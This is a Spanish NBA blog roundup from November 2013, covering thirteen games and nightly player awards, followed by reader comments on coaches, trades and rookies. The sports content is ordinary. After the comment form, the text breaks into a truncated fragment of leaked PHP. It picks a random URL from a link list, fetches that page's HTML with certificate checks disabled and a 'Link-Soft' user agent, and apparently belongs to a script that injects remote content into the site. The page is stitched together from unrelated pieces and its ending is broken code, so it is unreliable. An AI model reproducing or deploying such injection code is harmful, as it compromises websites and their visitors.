La Crónica: Rachas agotadas

28 de November de 2013 por Simon

Extensísima jornada en la NBA con 13 partidos muchos de ellos entre equipos con semejantes intereses que nos depararon algunas sorpresas. Se acabaron las rachas de victorias de San Antonio y Portland lo que deja a Indiana, que sí ganó, como líder único de la liga.

Como decíamos, los dos líderes del Oeste cayeron a manos de equipos de su propia conferencia. San Antonio perdió en el Chesapeake Energy Arena de Oklahoma City, un feudo aún imbatido esta temporada.  El partido se mantuvo igualado durante el primer tiempo a pesar del nefasto día en el tiro que estaba sufriendo Westbrook. En su lugar apareció desde el banco Reggie Jackson que mantuvo al equipo a flote durante el segundo cuarto. Ya en el tercero una racha de 10 puntos seguidos de Ibaka y un par de canastas de Durant le dieron a Oklahoma una ventaja que rondaba la decena de puntos. En el último cuarto volvió a aparecer Reggie Jackson para certificar la victoria de los Thunder (88-94). El segundo del Oeste también vio cortada su estupenda racha de triunfos pero lo hizo de una manera mucho más dolorosa por dos motivos: Dejaron escapar la oportunidad de haber liderado la conferencia y cayeron ante un equipo de lotería.  Y es que tras un buen primer cuarto de Portland, Phoenix Suns despertó y liderados por un imperial Goran Dragic se convirtieron en un ciclón que Portland no pudo controlar de ninguna manera (106-120).

En la parte noble del Este los dos líderes de la conferencia no pasaron ningún apuro a pesar de jugar fuera de casa. Indiana venció a Charlotte en un partido insufrible. Si en los dos primeros cuartos el desacierto y la imprecisión fueron la tónica general, en el tercer cuarto el partido viró hacia la somnolencia más intensa por las continuas interrupciones y ritmo lento. En el último cuarto la tónica cambio para los Pacers que sentenciaron el partido con 39 puntos comandados por un enchufadísimo CJ Watson (99-74). Indiana con esta victoria se ratifica como líder solitario de la liga. Por su parte, Miami venció a Cleveland Cavaliers en un partido en el que los Cavs no dieron excesiva guerra. Cuando Miami consiguió una ventaja de 7/8 puntos dio la impresión de que los Cavs se conformabann con que la renta no subiera mucho. Si esa era su intención, al menos la consiguieron (95-84). 

Ayer había un doble duelo entre la ciudad de los Los Angeles y New York.  Los Lakers visitaban a los Brooklyn Nets. Los visitantes, con un gran primer cuarto e inicio del segundo, consiguieron rentas cercanas a los 20 puntos pero en la segunda parte vieron como eran poco a poco reducidas por los hombres de Jason Kidd que incluso llegaron a empatar el partido a falta de 2 minutos gracias a una gran aparición desde el banco de Teletovic que por fin logra algo destacable en la NBA. Pero a partir de ahí los fallos de Nets y el acierto desde el tiro libre de Lakers cerró el partido (99-94). En el otro duelo, Clippers recibía a los Knicks en un partido que acabaría suponiendo la segunda victoria californiana de la noche ante New York. Clippers simplemente demostró ser mejor equipo y llevó todo el partido en rentas cómodas. A pesar de los acercamientos de los Knicks gracias exclusivamente a sus individualidades no dieron ninguna opción de victoria (80-93). Esta victoria permite a Clippers no perder comba respecto a los líderes del Oeste y mantener su cuarto puesto que ahora mismo es amenazado por Dallas Mavericks y Houston Rockets que también lograron sumar victorias en la jornada de ayer. Dallas logró una meritoria victoria en casa ante otro equipo de Play Off, los Golden State Warriors. El partido fue dominado por los Mavs en todas sus fases y sólo una serie de triples de los Warriors en el último cuarto puso en duda una victoria que Nowitzki se encargó de sentenciar (99-103). Houston tuvo un plácido partido ante los Hawks. Los Rockets mandaron durante los tres primeros cuartos pero en el último el partido cómodo se torno en paliza gracias a los 36 puntos de Rockets (84-113).

En el resto de la jornada, uno de los partidos más interesantes y vistosos para el aficionado era sin duda la visita de Denver Nuggets a los Wolves de Minnesota que terminó en victoria visitante con un marcador altísimo (117-110). Las alarmas deben estar ya encendidas en Minny pues ya son 4º por la cola en el Oeste.  Otro aspirante a Play Off en el Oeste, como son los Grizzlies, vencieron en Boston gracias a un primer cuarto en el que lograron una ventaja que se dedicaron a administrar el resto del juego (100-93). Chicago venció por primera vez tras la lesión de Rose en su vuelta al Este tras la gira por el Oeste. Lo hicieron en una gran segunda mitad en la que dejaron a los Pistons en 26 puntos (99-79).  En el duelo de los dos mejores rookies hasta el momento o lo que es lo mismo Sixers vs Magic, el partido se lo llevó Oladipo en un buen partido para ambos jóvenes (94-105). Para terminar, los Wizards precisaron de una prórroga para doblegar al peor equipo del Este, Milwaukee Bucks (100-92).

PREMIOS

MVP: Goran Dragic se ha echado a su equipo a las espaldas ante la baja de Eric Bledsoe. Anoche masacró a uno de los mejores equipos del año, los Blazers, con 31 puntos, 10 asistencias y 5 rebotes. Masacre es el término que también podemos utilizar para lo que hice Nikola Vucevic con el juego interior de los Sixers. El montenegrino acabó con 21 puntos (10 de 13 en TC), 16 rebotes, 5 asistencias y 3 tapones.

Rookie: Ayer se enfrentaban los dos mejores rookies del año. El partido lo ganaron los Magic de Victor Oladipo pero el duelo individual se lo llevó Michael Carter-Williams. El de los Sixers anotó 23 puntos y robó 4 balones mientras que el de los Magic anotó 18 puntos y robó 5 balones pero perdió 8.

Sorpresa: ¿Simplemente los Suns le están dando minutos para ponerlo en el escaparate o realmente Channing Frye será pieza clave en el equipo? Anoche cuajó uno de los mejores partidos que se le recuerdan con 25 puntos (10 de 12 en TC), 9 rebotes y 2 tapones.Por su parte, Taj Gibson abusó del potente juego interior de los Pistons con 23 puntos (11 de 13 en TC) y 8 rebotes. Y aunque no os lo creáis Andrea Bargnani fue el mejor de los Knicks con 20 puntos, 10 rebotes y 4 tapones.

Decepción: Aquejado de problemas en espalda y tobillo, Monta Ellis se quedó en 4 puntos con un 2 de 16 en tiros de campo. Al menos pudo repartir 10 asistencias. Russell Westbrook también anotó sólo 2 de sus 16 lanzamientos aunque él pudo llegar a los 6 puntos. Carlos Boozer y Greg Monroe se enfrentaban anoche y debieron llegar a alguno tipo de pacto porque no pudieron hacerlo peor. 6 puntos y 7 rebotes para el de los Bulls y 5 puntos y 3 rebotes para el de los Pistons.

Esfuerzo en vano: Les está costando competir a los Warriors sin Iguodala. Stephen Curry puso de su parte con 29 puntos y 8 asistencias. Jared Sullinger también jugó un gran partido (23 puntos y 12 rebotes) pero los Celtics cayeron ante los Grizzlies.

TOP-10

Imágenes | AP Photos / Getty Images

Comenta

27 comentarios a esta entrada

  1. rumbero dice:
    #1

    Madre mia Kidd. Igual dura dos partidos más como entrenador pero siempre puede irse a alguna escuela de interpretación a ganarse la vida.
    “No quedan tiempos muertos pero tranquilos, esto lo solucionó yo con mis dotes de coach”

      Citar

  2. rumbero dice:
    #2

    Y que duro va a estar el oeste esta temporada, o al menos eso parece de momento. Igual el “flojo” inicio de los Warriors que comentaba ayer Denise tiene bastante de eso (aparte de lesiones que han tenido y tienen). Un día tonto, un B2B o alguna baja importante y ahora mismo hay 11-12 equipos que te pueden ganar bien. Mucha tela

      Citar

  3. Jose Luis dice:
    #3

    Movimiento de crack de Jason Kidd, ciertamente.

      Citar

  4. txusma dice:
    #4

    Jose Luis:
    Movimiento de crack de Jason Kidd, ciertamente.

    Muy de veterano… Voy a colgar en vídeo en el blog.

    Gracias rumbero!

      Citar

  5. HisRoyalAirness dice:
    #5

    Esfuerzo en vano también, quinteto titular de los Wolves: 100 puntos-39 rebotes-17 asistencias

      Citar

  6. Viva_Dirk dice:
    #6

    En la jugada número 7 del top ten fijaros en como ‘defiende’ Love. Es así casi siempre, me esta decepcionando enormemente en ese sentido.

      Citar

  7. Denise dice:
    #7

    Para empezar, odio estas jornadas de 11 ó mas partidos, no te da tiempo a asimilar los resultados ni a saborear las lecturas, matices e impresiones que deja cada partido.

    1) No sé a que esperan los directivos de Nets, Pistons, Cavaliers y Knicks para cargarse al entrenador ó a algunos jugadores.

    2) ¿Podemos declarar ya a los Celtics como ganador del trade ante los Nets? Deportivamente ambos equipos estan igual de mal, pero los verdes conservan esas 3 rondas de Draft que el deberian dar muchas alegrias en el futuro.
    Aun así, pienso que con un entrenador serio, los Nets pueden remontar el vuelo. Su banquillo es demoledor y marca diferencia con otros equipos. Lo de la tactica de Kidd de que le tiren el whisky encima es patetica, digno de merecer una suspensión.

    3) Para sorpresa el banquillo de los Rockets. ¿que les han dado de comer a unos muertos como Garcia y Brooks ? Ayer 42 puntos y 16-26 en tiros entre los dos para un total de 67 puntos del resto del banco.

    4) Me alegra la lesión de Marc Gasol que va a propiciar que Ed Davis por fin cuente con minutos para demostrar su calidad. Ayer, 11ptos, 7 reb y 3 tapones en 24 minutos.

    5) ¿ Gerald Wallace que le pasa? Ese hombre debe tener problemas con las drogas o cualquier otro aspecto turbio, no es normal jugar a tan pesimo nivel en una plantilla con poca presión donde podia hacer muy buenos numeros. Recuerdo unos playoffs suyos con los Bobcats enfrentadose a los Magic y el tio era un p…maquina. Anotaba, reboteaba, y defendia como una bestia.

    6) Que mala pinta de los Knicks a corto, medio y largo plazo. A Melo solo lo van a poder retenar a base de dinero y no sé si ese es el remedio correcto. Si su elección es por proyecto deportivo y posibilidad de ganar un anillo pronto, se pira de ahí seguro. Cuando Amare acabe su contratazo solo puede jugar en esta liga por el minimo de dinero, y JR no tiene la cabeza en el baloncesto. Shumpert se ha quedado en un jugador de perfil medio-bajo, Felton es bueno pero irregular como el solo y Chandler está cascado. .

      Citar

  8. Esteban dice:
    #8

    wallace esta viejo, tan simple como eso

    siempre se supo que cuando llegara a la curva descendente de su carrera se le notaria muchisimo mas que a otros jugadores, dado que su juego era 120% fisico

      Citar

  9. Ruxixón dice:
    #9

    Confiaba en Cheeks pero que con tu juego interior se salga Taj Gibson,que partido tras partido tu equipo sea una madre en defensa y que supuestamente tu mejor jugador (Monroe) reciba tan pocos balones es principalmente culpa del entrenador.Y a Dumars se le acaba el tiempo.

    Como dice Denise está la cosa para que no paren de recibir llamadas en este grupo:Karl,Hollins,McMillan,Van Gundy.

      Citar

  10. Mamba_Blanca dice:
    #10

    Yo no se si Sloan querrá entrenar, pero a una plantilla como la de los Pistons… Madre mia, la convertiria en aspirantes en un par de años.

      Citar

  11. Mamba_Blanca dice:
    #11

    Y sinceramente, y me vais a atizar por ello, pero por mucho numero que haga Love, cuando se le ve jugar durante varios partidos, la forma de defender que tiene… no es para nada de una Superestrella de la liga. Es unicamente un jugadorazo en ataque y un poquito hace numeros.

      Citar

  12. futurman dice:
    #12

    Ahora mismo el mejor 4 es Aldridge con diferencia. Love está en números de MVP pero no ayuda a que el equipo esté arriba, Griffin juega en un equipazo y tampoco destaca tanto y Garnet/Duncan no están haciendo precisamente un temporadón.

      Citar

  13. JuniorPB dice:
    #13

    3) Para sorpresa el banquillo de los Rockets. ¿que les han dado de comer a unos muertos como Garcia y Brooks ? Ayer 42 puntos y 16-26 en tiros entre los dos para un total de 67 puntos del resto del banco.

    Tanto que me gusta este Blog y leer esto del jugador de tu patria, que defiende la bandera dominicana realmente decepciona, pero en fin somos libres de expresarnos.

    Pienso que en el cambio de los celtics-nets ganaron los verdes, tienen muy buen material joven en el equipo, pueden reconstruir alrededor de Rondo y lo que vendrá del draft es aún mejor, y también hay agentes libres muy buenos el año que viene….

      Citar

  14. rumbero dice:
    #14

    JuniorPB:
    3) Para sorpresa el banquillo de los Rockets. ¿que les han dado de comer a unos muertos como Garcia y Brooks ? Ayer 42 puntos y 16-26 en tiros entre los dos para un total de 67 puntos del resto del banco.

    Tanto que me gusta este Blog y leer esto del jugador de tu patria, que defiende la bandera dominicana realmente decepciona, pero en fin somos libres de expresarnos.

    No lo tengas en cuenta que a Denise le gusta dar mucha leña a todos aquellos jugadores que no son Rudy Gobert, Ed Davis o cualquiera de los Magic 😀 jaja

      Citar

  15. rumbero dice:
    #15

    Mamba_Blanca:
    Yo no se si Sloan querrá entrenar, pero a una plantilla como la de los Pistons… Madre mia, la convertiria en aspirantes en un par de años.

    O Hollins. Pintura dominante + mimbres para mejorar esta defensa de tres al cuarto que tiene ahora mismo. Podría encajar bien, aunque habría que ver que haría con Jennings. Mientras tanto pues Cheeks dándole bola a Bynum, Smith tirándose 5 triples por partido…

      Citar

  16. Denise dice:
    #16

    JuniorPB:

    Tanto que me gusta este Blog y leer esto del jugador de tu patria, que defiende la bandera dominicana realmente decepciona, pero en fin somos libres de expresarnos.

    Pero a ver…acaso no es una sorpresa que Garcia meta 21 puntos, ¿que cosa destacable ha hecho este hombre en los ultimos 3 años? No ha pasado de ser un jugador de los del final de rotación y gracias.

    Me da igual que sea dominicano, fidjiano ó moldavo, si un jugador es limitado, lo es y punto. Horford tambien es dominicano y como es un gran jugador no lo critico ó no me sorprende si se casca 21 puntos.

    A mi las banderas me la sudan, soy español porque lo dice mi DNI y nada más. Juzgo a las personas no en función de su nacionalidad sino en función de si los valores y personalidad que tienen me gustan o no.
    El que lo quiera hacer que lo haga, pero desde mis ideologías politicas apoyar a un deportista ó algun famoso simplemente por su nacionalidad me parece un argumento simplista. Apoyalo si quieres porque te caiga bien, te guste su personalidad, su forma de actuar en la vida, su actitud, sus valores pero no por una simple bandera.

      Citar

  17. Denise dice:
    #17

    Sloan tiene ya 71 años y no creo que con esa edad vuelva a entrenar. Lo unico que se me ocurre es que echen a un entrenador en febrero y él quiera tomar las riendas para un par de meses y playoff. Pero en una temporada completa con tantos viajes…, no creo que esté ya para eso.

    A mi me gustaría que volviese McMillan. Se llevó muchos palos en su etapa de Portland y siempre nos dividimos entre los que piensan que es un paquete y los que piensan que el hombre no podía hacer mucho más con tantas lesiones que tuvieron sus jugadores claves. Por lo que estaría bien verlo en un nuevo proyecto.

      Citar

  18. HisRoyalAirness dice:
    #18

    Mamba_Blanca:
    Y sinceramente, y me vais a atizar por ello, pero por mucho numero que haga Love, cuando se le ve jugar durante varios partidos, la forma de defender que tiene… no es para nada de una Superestrella de la liga. Es unicamente un jugadorazo en ataque y un poquito hace numeros.

    Si Love es hacenúmeros apaga y vámonos. Empezaron como un tiro y el quinteto titular de los Wolves está en números cojonudos. El banquillo es pura escoria. Dale a Love un par de jugadores de rotación más y ya verás.
    Y dos cosas: es blanco, y eso en el físico es clave. Los hombres grandes blancos sufren más con la acumulación de partidos y normalmente siempre ha habido estrellas que intentan evitar faltas, sobre todo de mercados pequeños y menos respetados por los árbitros. A él y Pekovic en ataque noles pitan nada. Y para coger 14 rebotes por partido siendo 4 ya me diréis cómo se hace sin partirse los morros debajo del aro.
    Mira que se le exige a algunos y no a otroa

      Citar

  19. Denise dice:
    #19

    Yo las criticas a Love ni las comparto ni las entiendo. Para mi es el mejor PF de la liga de largo, estar promediando 24-14-4 con ese fisico de mierda me parece que solo lo puede hacer un megacrack.
    Que defiende mal? Un poco, pero tampoco hay que ser tan tikismikis con esto. Hay un muchos negros musculosos que lo tienen todo para defender y no defienden un pimiento, por lo que no criticaría a Love por no defender cuando tiene ese pobre fisico de blanquito torpe y lo mas importante es el 60% de los Wolves y tiene que tomar mucho descanso y aire en defensa, primero para estar mental y fisicamente fresco en ataque y segundo para no cargarse de faltas que le hagan que tenga que jugar 25 minutos de media.

      Citar

  20. Denise dice:
    #20

    HisRoyalAirness: Empezaron como un tiro y el quinteto titular de los Wolves está en números cojonudos. El banquillo es pura escoria.

    Yo no creo que sea tan escoria, creo que está mal gestionado. De inicio sacaría a Barea y a Mbah de titulares en detriemnto de Rubio y Martin, aunque luego estos acaben jugando mas. Barea es un buen anotador y no tan buen asistente como Ricky, pero Love y Pekovic a diferencia de otros (y no quiero dar nombres para no liarla jeje) saben jugar solos, no necesitan tanto tener a un base asistente que les ponga balones a huevo para que machaquen. En esos momentos, entre Barea, Love y Pekovic soportarian bastante bien el peso ofensivo y Mbah y Brewer les apretarían las tuercas en defensa a los alas titulares rivales.
    Despues, una vez que empieza el carrusel de cambios, sacas a Kevin Martin para enchufar y no sufrir ni agotarese tanto en defensa defendiendo muchos minutos a los alas suplentes del rival, y a Rubio para distribuir y ponerle canastas a huevo a Cunningham (que me parece un jugador muy valido) ó Turiaf.
    Por otra parte me quitaría de en medio a Budinger. El pelirrojo es un jugador que nunca me ha gustado, pero tiene buen cartel y para mi sería esencial traspasarlo por un jugador interior (Timofey Mozgov ó Darrell Arthur) y de paso darle mas minutos en las alas a Shved y Muhammad.

      Citar

  21. Denise dice:
    #21

    Rumores de traspaso entre equipos texanos.

    Dallas daría a Marion y Larkin a Houston a cambio de Asik.

    Me parece una operación cojonuda para ambos. Dallas consigue a ese C tan ansaido teniendo por fin una pintura aseada para luchar de tu a tu con todos los salvajes del Oeste.
    Y Houston se quita de encima el problema que supone tener a Asik en el equipo y se reforzaría donde mas falta, en el PF donde Marion a pesar de su edad lo veo bastante compatible a DH. Y bueno, se harían tambien con Larkin esperando a que el rookie algun día explote.

      Citar

  22. Denise dice:
    #22

    Una de números, actualmente hay 28 rookies que promedian mas de 6,1 minutos por partido.
    De entre ellos, Anthony Bennet es el que peor PER tiene (2,32). Decepcionantes campañas tambien de Tyler Zeller (puesto 21) y Dennis Schroeder (puesto 24)

      Citar

  23. Denise dice:
    #23

    Denise:
    Una de números, actualmente hay 28 rookies que promedian mas de 6,1 minutos por partido.
    De entre ellos, Anthony Bennet es el que peor PER tiene (2,32). Decepcionantes campañas tambien de Tyler Zeller (puesto 21) y Dennis Schroeder (puesto 24)

    Queria decir Cody Zeller, el de los Bobcats, no Tyler.

      Citar

  24. Esteban dice:
    #24

    hay que darle tiempo a Cody ZELLER, lo suyo a sido decepcionante hasta el momento es cierto, pero si tengo que apostar a un jugador sin impacto aun que sera un titular solido en el futuro, ZELLER es mi eleccion

    por que? tiene etica de trabajo, y es muy sacrificado, el fisico no es atletico, pero es alto y puede pivot en la NBA donde abundan los pedazos de carne de 2.10, con el tiempo desarrollara un tiro respetable a la distancia y se sacrificara en defensa

    vamos que esta camada del draft es pesima, si de aqui sacas un 5 titular con algo de tiro, debes considerarte afortunado

      Citar

  25. Esteban dice:
    #25

    los CAVS, deberian hablar con Mike BROWN, o pones de titular y haces jugar a Bennet o te vas…

    sencillo, es cierto que ha jugado mal, pero es un PICK 1!!! al menos denle posibilidades y minutos, me hace acordar a Milicic, un desperdicio de seleccion, si pensaban luchar por PO y no perdonar a los jugadores que se equivocan, deberian haber traspasado su pick

      Citar

  26. Simon dice:
    #26

    Esteban:
    los CAVS, deberian hablar con Mike BROWN, o pones de titular y haces jugar a Bennet o te vas…

    sencillo, es cierto que ha jugado mal, pero es un PICK 1!!! al menos denle posibilidades y minutos, me hace acordar a Milicic, un desperdicio de seleccion, si pensaban luchar por PO y no perdonar a los jugadores que se equivocan, deberian haber traspasado su pick

    Ahi estoy de acuerdo Esteban salvo Irving y a ratos Waiters el equipo es pésimo… le deberian dar minutos a Bennet por malo que sea para ver si pueden sacar algo de el… aunque sea burlas por cogerlo en el 1…

      Citar

  27. Ruxixón dice:
    #27

    +1 a lo de Bennett,es imposible que sea tan malo en proporción a todas las críticas que recibe.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>